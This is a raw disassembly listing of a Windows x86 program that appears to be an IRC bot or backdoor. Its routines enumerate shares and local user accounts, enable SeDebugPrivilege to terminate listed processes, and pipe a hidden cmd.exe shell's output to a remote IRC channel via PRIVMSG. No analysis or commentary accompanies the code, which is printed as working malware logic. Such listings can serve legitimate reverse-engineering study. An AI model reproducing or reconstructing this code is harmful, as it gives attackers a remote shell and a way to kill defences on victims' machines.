var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_4204DD
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_42B05C ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_4204DD
lea eax, [ebp+var_71C]
push eax
call sub_4206A3
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call ds:dword_444114
test eax, eax
jnz short loc_41BF1A
push offset unk_4385CC
mov esi, offset dword_4E1F70
push esi
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_41BF41
; ---------------------------------------------------------------------------
loc_41BF1A: ; CODE XREF: sub_41BE8A+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_41BD5A
push eax
push offset dword_4385A0
mov esi, offset dword_4E1F70
push esi
call sub_41E6A6
add esp, 14h
loc_41BF41: ; CODE XREF: sub_41BE8A+8E�j
mov eax, esi
pop esi
leave
retn
sub_41BE8A endp
; =============== S U B R O U T I N E =======================================
sub_41BF46 proc near ; CODE XREF: sub_40274D:loc_406A33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_41BF9C
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push ds:dword_443408[esi]
push edi
push eax
call sub_41B465
add esp, 14h
test eax, eax
jnz short loc_41BF8E
push edi
push ds:off_443404[esi]
push offset unk_438644
loc_41BF7E: ; CODE XREF: sub_41BF46+54�j
mov esi, offset dword_4E2170
push esi
call sub_41E6A6
add esp, 10h
jmp short loc_41BFB9
; ---------------------------------------------------------------------------
loc_41BF8E: ; CODE XREF: sub_41BF46+2A�j
call sub_41B507
push eax
push edi
push offset unk_438618
jmp short loc_41BF7E
; ---------------------------------------------------------------------------
loc_41BF9C: ; CODE XREF: sub_41BF46+C�j
lea eax, [eax+eax*2]
push ds:off_443400[eax*4]
mov esi, offset dword_4E2170
push offset unk_4385F4
push esi
call sub_41E6A6
add esp, 0Ch
loc_41BFB9: ; CODE XREF: sub_41BF46+46�j
pop edi
mov eax, esi
pop esi
retn
sub_41BF46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BFBE proc near ; CODE XREF: sub_40274D:loc_406B1D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_41C056
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41BFE7
dec eax
jnz short loc_41C036
push edi
push 0
call sub_41B8EE
pop ecx
pop ecx
jmp short loc_41C032
; ---------------------------------------------------------------------------
loc_41BFE7: ; CODE XREF: sub_41BFBE+18�j
cmp [ebp+arg_8], 0
jnz short loc_41C024
push 24h
push edi
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jnz short loc_41C024
push 57h
pop eax
loc_41BFFE: ; CODE XREF: sub_41BFBE+76�j
call sub_41BD5A
push eax
push edi
lea eax, [esi+esi*2]
push ds:off_443400[eax*4]
mov esi, offset dword_4E2370
push offset unk_4386A0
push esi
call sub_41E6A6
add esp, 14h
jmp short loc_41C076
; ---------------------------------------------------------------------------
loc_41C024: ; CODE XREF: sub_41BFBE+2D�j
; sub_41BFBE+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_41B883
add esp, 0Ch
loc_41C032: ; CODE XREF: sub_41BFBE+27�j
test eax, eax
jnz short loc_41BFFE
loc_41C036: ; CODE XREF: sub_41BFBE+1B�j
push edi
lea eax, [esi+esi*2]
push ds:off_443404[eax*4]
mov esi, offset dword_4E2370
push offset dword_438684
push esi
call sub_41E6A6
add esp, 10h
jmp short loc_41C076
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: sub_41BFBE+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push ds:off_443400[eax*4]
mov esi, offset dword_4E2370
push offset unk_438660
push esi
call sub_41E6A6
add esp, 0Ch
loc_41C076: ; CODE XREF: sub_41BFBE+64�j
; sub_41BFBE+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_41BFBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C07C proc near ; CODE XREF: sub_40274D+43F9�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_41B7C1
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_40123B
add esp, 18h
loc_41C0B5: ; CODE XREF: sub_41C07C+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call ds:dword_44420C
mov ebx, eax
cmp ebx, esi
jz short loc_41C116
cmp ebx, 0EAh
jz short loc_41C116
push ebx
call sub_41BD5A
push eax
lea eax, [ebp+var_214]
push offset unk_4386EC
push eax
call sub_41E6A6
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 24h
jmp short loc_41C183
; ---------------------------------------------------------------------------
loc_41C116: ; CODE XREF: sub_41C07C+5D�j
; sub_41C07C+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_41C17A
mov esi, [ebp+var_8]
add esi, 14h
loc_41C124: ; CODE XREF: sub_41C07C+FA�j
push dword ptr [esi+10h]
call ds:dword_444204 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41C13B
mov eax, offset aNo ; "No"
loc_41C13B: ; CODE XREF: sub_41C07C+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_41E6A6
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_41C124
xor esi, esi
loc_41C17A: ; CODE XREF: sub_41C07C+A0�j
push [ebp+var_8]
call ds:dword_444140
loc_41C183: ; CODE XREF: sub_41C07C+98�j
cmp ebx, 0EAh
jz loc_41C0B5
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41C07C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C19B proc near ; CODE XREF: sub_40274D:loc_406BAB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_41C23E
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_41C1DD
dec eax
jz short loc_41C1D2
dec eax
jnz short loc_41C1F8
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_41B98C
add esp, 14h
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1D2: ; CODE XREF: sub_41C19B+1D�j
push ebx
push edi
call sub_41B96B
pop ecx
pop ecx
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1DD: ; CODE XREF: sub_41C19B+1A�j
cmp [ebp+arg_8], edi
jz short loc_41C1F1
push [ebp+arg_8]
push ebx
push edi
call sub_41B911
add esp, 0Ch
jmp short loc_41C1F4
; ---------------------------------------------------------------------------
loc_41C1F1: ; CODE XREF: sub_41C19B+45�j
push 57h
pop eax
loc_41C1F4: ; CODE XREF: sub_41C19B+35�j
; sub_41C19B+40�j ...
cmp eax, edi
jnz short loc_41C218
loc_41C1F8: ; CODE XREF: sub_41C19B+20�j
push ebx
lea eax, [esi+esi*2]
push ds:off_443404[eax*4]
mov esi, offset dword_4E2570
push offset unk_4387A4
push esi
call sub_41E6A6
add esp, 10h
jmp short loc_41C25E
; ---------------------------------------------------------------------------
loc_41C218: ; CODE XREF: sub_41C19B+5B�j
call sub_41BD5A
push eax
push ebx
lea eax, [esi+esi*2]
push ds:off_443400[eax*4]
mov esi, offset dword_4E2570
push offset unk_438774
push esi
call sub_41E6A6
add esp, 14h
jmp short loc_41C25E
; ---------------------------------------------------------------------------
loc_41C23E: ; CODE XREF: sub_41C19B+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push ds:off_443400[eax*4]
mov esi, offset dword_4E2570
push offset unk_43874C
push esi
call sub_41E6A6
add esp, 0Ch
loc_41C25E: ; CODE XREF: sub_41C19B+7B�j
; sub_41C19B+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_41C19B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C265 proc near ; CODE XREF: sub_40274D+4487�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_41B7C1
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_40123B
add esp, 18h
push ebx
loc_41C2A4: ; CODE XREF: sub_41C265+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call ds:dword_4440E0
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_41C303
cmp eax, 0EAh
jz short loc_41C303
push eax
call sub_41BD5A
push eax
lea eax, [ebp+var_21C]
push offset unk_438810
push eax
call sub_41E6A6
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 24h
jmp short loc_41C374
; ---------------------------------------------------------------------------
loc_41C303: ; CODE XREF: sub_41C265+62�j
; sub_41C265+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41C387
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_41C374
loc_41C311: ; CODE XREF: sub_41C265+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_41C350
push dword ptr [edi]
push offset aS_4 ; " %S"
push eax
call sub_41E6A6
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_41C311
jmp short loc_41C374
; ---------------------------------------------------------------------------
loc_41C350: ; CODE XREF: sub_41C265+B4�j
push offset unk_4387DC
push eax
call sub_41E6A6
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 1Ch
loc_41C374: ; CODE XREF: sub_41C265+9C�j
; sub_41C265+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41C387
push edi
call ds:dword_444140
xor edi, edi
mov [ebp+var_4], edi
loc_41C387: ; CODE XREF: sub_41C265+A3�j
; sub_41C265+114�j
cmp [ebp+var_10], 0EAh
jz loc_41C2A4
cmp edi, esi
pop ebx
jz short loc_41C3A0
push edi
call ds:dword_444140
loc_41C3A0: ; CODE XREF: sub_41C265+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_41E6A6
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_41C265 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3D9 proc near ; CODE XREF: sub_41AEBB+7�p
; sub_41C444+61�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_42B09C ; GetCurrentProcess
push eax
call ds:dword_444244 ; OpenProcessToken
test eax, eax
jnz short loc_41C3F8
leave
retn
; ---------------------------------------------------------------------------
loc_41C3F8: ; CODE XREF: sub_41C3D9+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call ds:dword_444228 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41C436
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_41C41F
or [ebp+var_8], 2
jmp short loc_41C423
; ---------------------------------------------------------------------------
loc_41C41F: ; CODE XREF: sub_41C3D9+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41C423: ; CODE XREF: sub_41C3D9+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call ds:dword_444170 ; AdjustTokenPrivileges
mov esi, eax
loc_41C436: ; CODE XREF: sub_41C3D9+32�j
push [ebp+var_4]
call ds:dword_42B004 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_41C3D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=60h
sub_41C444 proc near ; CODE XREF: sub_40274D+7533�p
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
lea ebp, [esp-60h]
sub esp, 550h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp ds:dword_4440F0, ebx
pop ecx
lea edi, [ebp+60h+var_128]
mov [ebp+60h+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+60h+var_34C]
mov [ebp+60h+var_350], ebx
rep stosd
jz loc_41C635
cmp ds:dword_444154, ebx
jz loc_41C635
cmp ds:dword_4440A4, ebx
jz loc_41C635
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_4440F0 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+60h+var_4], edi
jz loc_41C628
lea eax, [ebp+60h+var_12C]
push eax
push edi
mov [ebp+60h+var_12C], 128h
call ds:dword_444154 ; Process32First
test eax, eax
mov esi, ds:dword_42B004
jz loc_41C623
lea eax, [ebp+60h+var_12C]
push eax
push edi
call ds:dword_4440A4 ; Process32Next
test eax, eax
jz loc_41C623
mov ebx, ds:dword_42B040
loc_41C505: ; CODE XREF: sub_41C444+1D7�j
xor edi, edi
cmp [ebp+60h+arg_10], edi
jz short loc_41C562
loc_41C50C: ; CODE XREF: sub_41C444+E5�j
push ds:off_443460[edi]
lea eax, [ebp+60h+var_108]
push eax
call ds:dword_42B124 ; lstrcmpi
test eax, eax
jz short loc_41C530
add edi, 4
cmp edi, 60h
jb short loc_41C50C
jmp loc_41C609
; ---------------------------------------------------------------------------
loc_41C530: ; CODE XREF: sub_41C444+DD�j
push [ebp+60h+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_41C609
push 0
push edi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz loc_41C609
loc_41C55A: ; CODE XREF: sub_41C444+1AB�j
push edi
call esi ; CloseHandle
jmp loc_41C609
; ---------------------------------------------------------------------------
loc_41C562: ; CODE XREF: sub_41C444+C6�j
cmp [ebp+60h+arg_C], edi
jnz loc_41C5F4
cmp [ebp+60h+arg_4], edi
jz loc_41C609
push [ebp+60h+var_124]
push 8
call ds:dword_4440F0 ; CreateToolhelp32Snapshot
cmp [ebp+60h+arg_14], 0
mov edi, eax
mov [ebp+60h+var_350], 224h
jz short loc_41C5B4
lea eax, [ebp+60h+var_350]
push eax
push edi
call ds:dword_444118 ; Module32First
test eax, eax
push [ebp+60h+var_124]
jz short loc_41C5BA
lea eax, [ebp+60h+var_230]
jmp short loc_41C5C0
; ---------------------------------------------------------------------------
loc_41C5B4: ; CODE XREF: sub_41C444+14E�j
push [ebp+60h+var_124]
loc_41C5BA: ; CODE XREF: sub_41C444+166�j
lea eax, [ebp+60h+var_108]
loc_41C5C0: ; CODE XREF: sub_41C444+16E�j
push eax
lea eax, [ebp+60h+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_41E6A6
add esp, 10h
push 1
push [ebp+60h+arg_8]
lea eax, [ebp+60h+var_550]
push eax
push [ebp+60h+arg_4]
push [ebp+60h+arg_0]
call sub_40123B
add esp, 14h
jmp loc_41C55A
; ---------------------------------------------------------------------------
loc_41C5F4: ; CODE XREF: sub_41C444+121�j
push [ebp+60h+arg_C]
lea eax, [ebp+60h+var_108]
push eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_41C63F
loc_41C609: ; CODE XREF: sub_41C444+E7�j
; sub_41C444+FF�j ...
lea eax, [ebp+60h+var_12C]
push eax
push [ebp+60h+var_4]
call ds:dword_4440A4 ; Process32Next
test eax, eax
jnz loc_41C505
xor ebx, ebx
loc_41C623: ; CODE XREF: sub_41C444+9F�j
; sub_41C444+B5�j
push [ebp+60h+var_4]
call esi ; CloseHandle
loc_41C628: ; CODE XREF: sub_41C444+79�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
pop ecx
pop ecx
loc_41C635: ; CODE XREF: sub_41C444+3C�j
; sub_41C444+48�j ...
xor eax, eax
loc_41C637: ; CODE XREF: sub_41C444+226�j
pop edi
pop esi
pop ebx
add ebp, 60h
leave
retn
; ---------------------------------------------------------------------------
loc_41C63F: ; CODE XREF: sub_41C444+1C3�j
push [ebp+60h+var_124]
push 0
push 1F0FFFh
call ebx ; OpenProcess
push [ebp+60h+var_4]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz short loc_41C667
push edi
call esi ; CloseHandle
jmp short loc_41C635
; ---------------------------------------------------------------------------
loc_41C667: ; CODE XREF: sub_41C444+21C�j
xor eax, eax
inc eax
jmp short loc_41C637
sub_41C444 endp
; ---------------------------------------------------------------------------
dword_41C66C dd 246C8D55h, 98EC818Ch, 8B000002h, 57567C45h, 8B59266Ah
; DATA XREF: sub_40274D+24CA�o
dd 0DC7D8DF0h, 80C7A5F3h, 94h, 1, 0FDDC858Dh, 0F868FFFFh
dd 50004389h, 2005E8h, 39F63300h, 59596C75h, 0FF561A75h
dd 858D6875h, 0FFFFFDDCh, 0E0458D50h, 0DC75FF50h, 0FE4B7AE8h
dd 14C483FFh, 8D6475FFh, 5656E045h, 506875FFh, 0E8DC75FFh
dd 0FFFFFD6Ch, 8518C483h, 0DC858DC0h, 75FFFFFDh, 89D46807h
dd 5EB0043h, 4389B068h, 0AFE85000h, 3900001Fh, 59596C75h
dd 0FF561A75h, 858D6875h, 0FFFFFDDCh, 0E0458D50h, 0DC75FF50h
dd 0FE4B26E8h, 14C483FFh, 0FDDC858Dh, 0E850FFFFh, 0FFFFB64Ch
dd 0E86075FFh, 0FFFEEA1Dh, 0FF565959h, 42B06815h
db 0, 0CCh
; =============== S U B R O U T I N E =======================================
sub_41C736 proc near ; CODE XREF: sub_40274D+74D4�p
; sub_40AF6E+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_42B040 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41C768
push 0
push esi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz short loc_41C768
push esi
xor edi, edi
call ds:dword_42B004 ; CloseHandle
loc_41C768: ; CODE XREF: sub_41C736+1A�j
; sub_41C736+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41C736 endp
; ---------------------------------------------------------------------------
byte_41C76D db 56h, 33h, 0F6h ; DATA XREF: sub_40A263+3B4�o
dd 5656016Ah, 0E8565656h, 0FFFFFCC8h, 0FF18C483h, 44345835h
dd 1415FF00h, 0EB0042B0h
db 0E3h
; =============== S U B R O U T I N E =======================================
sub_41C78D proc near ; CODE XREF: sub_41C7BD+2A�p
; sub_41C7F5+7E�p ...
mov eax, ds:dword_4E277C
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_42B004
jz short loc_41C7A1
push eax
call esi ; CloseHandle
loc_41C7A1: ; CODE XREF: sub_41C78D+F�j
mov eax, ds:dword_4E2778
cmp eax, 0FFFFFFFFh
jz short loc_41C7AE
push eax
call esi ; CloseHandle
loc_41C7AE: ; CODE XREF: sub_41C78D+1C�j
mov eax, ds:dword_4E27B4
cmp eax, 0FFFFFFFFh
jz short loc_41C7BB
push eax
call esi ; CloseHandle
loc_41C7BB: ; CODE XREF: sub_41C78D+29�j
pop esi
retn
sub_41C78D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7BD proc near ; CODE XREF: sub_40274D+7216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_41E1C0
pop ecx
push 0
lea ecx, [ebp+var_4]
push ecx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push ds:dword_4E2770
call ds:dword_42B084 ; WriteFile
test eax, eax
jnz short loc_41C7F0
call sub_41C78D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C7F0: ; CODE XREF: sub_41C7BD+28�j
xor eax, eax
inc eax
leave
retn
sub_41C7BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7F5 proc near ; CODE XREF: seg000:0041C93C�p
; seg000:0041C983�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_42B633
push [ebp+arg_4]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_41C838
push 7D0h
call ds:dword_42B014 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS_1 ; "PRIVMSG %s :%s\r"
push eax
call sub_41E6A6
add esp, 10h
jmp short loc_41C84F
; ---------------------------------------------------------------------------
loc_41C838: ; CODE XREF: sub_41C7F5+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS ; "%s"
push eax
call sub_41E6A6
add esp, 0Ch
loc_41C84F: ; CODE XREF: sub_41C7F5+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4441A0 ; send
test eax, eax
jg short loc_41C878
call sub_41C78D
loc_41C878: ; CODE XREF: sub_41C7F5+7C�j
xor eax, eax
leave
retn
sub_41C7F5 endp
; ---------------------------------------------------------------------------
loc_41C87C: ; DATA XREF: sub_41C9D4+174�o
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
push esi
xor edi, edi
lea eax, [ebp-20Ch]
push edi
push eax
call sub_41E5F0
mov ebx, ds:dword_42B12C
jmp loc_41C952
; ---------------------------------------------------------------------------
loc_41C8A8: ; CODE XREF: seg000:0041C96D�j
cmp [ebp-4], edi
jnz short loc_41C8D8
lea eax, [ebp-8]
push eax
push ds:dword_4E27B4
call ds:dword_42B128 ; GetExitCodeProcess
test eax, eax
jz short loc_41C8CE
cmp dword ptr [ebp-8], 103h
jnz loc_41C9A0
loc_41C8CE: ; CODE XREF: seg000:0041C8BF�j
push 0Ah
call ds:dword_42B014 ; Sleep
jmp short loc_41C944
; ---------------------------------------------------------------------------
loc_41C8D8: ; CODE XREF: seg000:0041C8AB�j
xor eax, eax
cmp [ebp-4], edi
jbe short loc_41C8F3
loc_41C8DF: ; CODE XREF: seg000:0041C8F1�j
cmp byte ptr [ebp+eax-20Ch], 0Ah
jz loc_41C997
inc eax
cmp eax, [ebp-4]
jb short loc_41C8DF
loc_41C8F3: ; CODE XREF: seg000:0041C8DD�j
mov [ebp-4], esi
loc_41C8F6: ; CODE XREF: seg000:0041C99B�j
push esi
lea eax, [ebp-20Ch]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
push edi
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-4]
lea eax, [ebp-20Ch]
push eax
push ds:dword_4E277C
call ds:dword_42B080 ; ReadFile
test eax, eax
jz loc_41C9AC
lea eax, [ebp-20Ch]
push eax
push offset dword_4E2780
push ds:dword_4E2774
call sub_41C7F5
add esp, 0Ch
loc_41C944: ; CODE XREF: seg000:0041C8D6�j
push esi
lea eax, [ebp-20Ch]
push edi
push eax
call sub_41E5F0
loc_41C952: ; CODE XREF: seg000:0041C8A3�j
add esp, 0Ch
push edi
push edi
lea eax, [ebp-4]
push eax
push esi
lea eax, [ebp-20Ch]
push eax
push ds:dword_4E277C
call ebx ; PeekNamedPipe
test eax, eax
jnz loc_41C8A8
push offset unk_438A80
push offset dword_4E2780
push ds:dword_4E2774
call sub_41C7F5
push dword ptr [ebp+8]
call sub_40B149
add esp, 10h
push 1
jmp short loc_41C9CD
; ---------------------------------------------------------------------------
loc_41C997: ; CODE XREF: seg000:0041C8E7�j
inc eax
mov [ebp-4], eax
jmp loc_41C8F6
; ---------------------------------------------------------------------------
loc_41C9A0: ; CODE XREF: seg000:0041C8C8�j
call sub_41C78D
push offset unk_438A58
jmp short loc_41C9B1
; ---------------------------------------------------------------------------
loc_41C9AC: ; CODE XREF: seg000:0041C924�j
push offset unk_438A28
loc_41C9B1: ; CODE XREF: seg000:0041C9AA�j
push offset dword_4E2780
push ds:dword_4E2774
call sub_41C7F5
push dword ptr [ebp+8]
call sub_40B149
add esp, 10h
push edi
loc_41C9CD: ; CODE XREF: seg000:0041C995�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9D4 proc near ; CODE XREF: sub_40274D+22E8�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_41C78D
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call ds:dword_444124 ; SearchPathA
test eax, eax
jnz short loc_41CA0B
or eax, 0FFFFFFFFh
jmp loc_41CB8A
; ---------------------------------------------------------------------------
loc_41CA0B: ; CODE XREF: sub_41C9D4+2D�j
push ebx
push edi
mov edi, ds:dword_42B0A0
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41CAD2
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41CAD2
mov edi, ds:dword_42B09C
push 3
push esi
push esi
push offset dword_4E2770
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
